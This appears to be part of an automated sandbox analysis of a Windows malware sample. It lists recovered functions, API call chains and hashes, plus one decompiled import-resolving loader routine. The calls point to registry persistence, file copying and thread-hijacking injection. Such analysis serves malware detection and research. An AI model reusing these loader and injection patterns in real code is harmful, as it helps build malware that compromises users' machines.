  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
